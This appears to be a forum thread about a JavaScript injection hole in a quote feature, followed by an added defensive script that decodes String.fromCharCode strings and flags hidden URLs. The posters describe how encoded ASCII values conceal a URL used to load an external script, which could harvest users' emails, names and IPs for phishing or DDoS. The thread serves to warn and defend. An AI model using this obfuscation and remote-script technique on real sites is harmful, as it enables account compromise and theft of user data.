There's a huge security exploit. If you see any JavaScript in a post, don't click the quote link. All of the examples that we posted so far are benign, but there's a huge potential for someone to use this to compromise hundreds of accounts.
Yeah, I had heard about all that. I just had no idea what JavaScript even looked like until today lol, so I have no idea what all these numbers mean/how they make some kind of action occur.
The String.fromCharCode() method takes a series of ASCII values and forms them into a string.
That means that String.fromCharCode(104) is equal to a lower case 'h'. String.fromCharCode(104, 116) is equal to 'ht'. If I continue to add ASCII values, I can form a whole URL.
An easier way to do it would be to just say "http://www.example.com", but you would need to surround it in quotes, which doesn't work. It would also make the code human-readable, which makes the exploit a lot more obvious.
In my post earlier on this page, I use String.fromCharCode() to pass a URL to a method that loads an external JavaScript file (Lifer posted the link to it), which does all of the actions that you see. This is especially dangerous because it allows the exploiter to access their server, which means they can do just about anything they want. They could store your email (if you log in with one) and display name to create extremely realistic phishing emails. On a smaller scale, someone could grab your IP if you quoted them, which would allow them to easily DDoS you (I just display your IP in my post, I don't record them).
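For anyone moderating or filtering posts, the decoding described in the posts above can be automated. The following is an added example, not code from any post in this thread: it finds String.fromCharCode(...) calls in post text and reveals the string the numbers hide. The function names and the sample post are constructed for illustration.

```javascript
// Added example: reveal strings hidden behind String.fromCharCode(...) in post text.
// Function names (decodeFromCharCode, flagPost) are hypothetical, not forum code.

// Matches String.fromCharCode( <comma-separated decimal or hex integers> ).
const NUM = '(?:0x[0-9a-f]+|\\d+)';
const FROM_CHAR_CODE = new RegExp(
  'String\\s*\\.\\s*fromCharCode\\s*\\(\\s*(' + NUM + '(?:\\s*,\\s*' + NUM + ')*)\\s*\\)',
  'gi'
);

// Return every fromCharCode call in the text together with its decoded string.
function decodeFromCharCode(text) {
  const findings = [];
  for (const match of text.matchAll(FROM_CHAR_CODE)) {
    const codes = match[1].split(',').map((n) => Number(n.trim()));
    // Skip values outside the UTF-16 code unit range instead of guessing.
    if (codes.some((c) => !Number.isInteger(c) || c < 0 || c > 0xffff)) continue;
    findings.push({ index: match.index, decoded: String.fromCharCode(...codes) });
  }
  return findings;
}

// Flag a post if it contains any encoded string; list decoded values that are URLs.
function flagPost(text) {
  const decoded = decodeFromCharCode(text).map((f) => f.decoded);
  const hiddenUrls = decoded.filter((s) => /^(?:https?:)?\/\//i.test(s));
  return { suspicious: decoded.length > 0, decoded, hiddenUrls };
}

// Constructed sample post body; the numbers spell "http://www.example.com".
const samplePost =
  'check this out String.fromCharCode(104,116,116,112,58,47,47,119,119,119,' +
  '46,101,120,97,109,112,108,101,46,99,111,109) lol';

console.log(flagPost(samplePost));
```

A post that trips this check is worth holding for review before anyone can quote it, since the readable URL only appears after decoding.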